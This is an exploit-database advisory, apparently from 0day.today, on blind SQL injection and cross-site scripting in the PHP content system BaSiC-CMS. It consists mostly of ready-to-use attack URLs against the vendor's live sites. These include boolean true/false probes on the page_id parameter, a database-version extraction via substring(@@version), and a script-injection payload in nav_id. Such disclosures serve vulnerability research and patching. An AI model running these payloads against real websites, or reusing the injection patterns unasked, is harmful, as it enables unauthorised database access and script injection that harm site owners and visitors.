id: 10867
date: 02/12/2010
title: BaSiC-CMS Script (SQL Blind/XSS) Multiple Remote Vulnerabilities
author: Red-D3v1L
cves: 

================================================================
BaSiC-CMS Script (SQL Blind/XSS) Multiple Remote Vulnerabilities
================================================================

    [?] Script:               [ BaSiC-CMS ]
    [?] Home Scirpt           [ http://www.basic-cms.de/ ]
    [?] Language:             [ PHP ]
    [?] Founder:              [ Red-D3v1L ]

########################################################################
   
===[ Exploit SQL Blind ]===

   
[ ] Exploit : index.php?r=&page_id=[Blind]


http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%201=1 << this true

http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%201=0 << this faulse


http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%20substring%28@@version,1,1%29=4  << this true


http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%20substring%28@@version,1,1%29=5 << this faulse


===[ Exploit XSS ]===


index.php?&nav_id=[XSS Code]


http://www.basic-cms.de/pages/index.php?&nav_id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E


./Greetz For All my Frindes
==============================================================================



#  0day.today [2023-03-25]  #